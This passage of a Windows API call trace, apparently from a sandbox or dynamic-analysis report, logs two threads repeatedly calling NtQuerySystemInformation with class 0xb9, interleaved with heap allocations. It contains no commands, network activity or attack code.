NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 640 os_tid = 0x1108 Thread: id = 641 os_tid = 0xfb4 [0205.930] GetProcessHeap () returned 0x2026c630000 [0205.930] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0205.931] GetProcessHeap () returned 0x2026c630000 [0205.931] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d422ac0 [0205.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.932] GetProcessHeap () returned 0x2026c630000 [0205.932] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d2630c0 [0205.932] GetProcessHeap () returned 0x2026c630000 [0205.932] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d428a40 [0205.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.933] GetProcessHeap () returned 0x2026c630000 [0205.933] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dd90 [0205.933] GetProcessHeap () returned 0x2026c630000 [0205.933] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d41fb00 [0205.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0205.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.939] GetProcessHeap () returned 0x2026c630000 [0205.939] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c800 [0205.939] GetProcessHeap () returned 0x2026c630000 [0205.939] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420600 [0205.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.939] GetProcessHeap () returned 0x2026c630000 [0205.939] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d23e330 [0205.939] GetProcessHeap () returned 0x2026c630000 [0205.940] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d4291c0 [0205.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.940] GetProcessHeap () returned 0x2026c630000 [0205.940] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63cad0 [0205.940] GetProcessHeap () returned 0x2026c630000 [0205.940] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420400 [0205.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.944] GetProcessHeap () returned 0x2026c630000 [0205.944] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0205.945] GetProcessHeap () returned 0x2026c630000 [0205.945] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d4204e0 [0205.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.945] GetProcessHeap () returned 0x2026c630000 [0205.945] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d242480 [0205.945] GetProcessHeap () returned 0x2026c630000 [0205.945] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d4297f0 [0205.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.946] GetProcessHeap () returned 0x2026c630000 [0205.946] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0205.946] GetProcessHeap () returned 0x2026c630000 [0205.946] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d4206a0 [0205.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0205.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.015] GetProcessHeap () returned 0x2026c630000 [0206.015] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63ccb0 [0206.015] GetProcessHeap () returned 0x2026c630000 [0206.015] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d4e2ba0 [0206.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.018] GetProcessHeap () returned 0x2026c630000 [0206.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d2ff1f0 [0206.018] GetProcessHeap () returned 0x2026c630000 [0206.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d429eb0 [0206.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.018] GetProcessHeap () returned 0x2026c630000 [0206.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0206.018] GetProcessHeap () returned 0x2026c630000 [0206.018] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d4e3420 [0206.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, 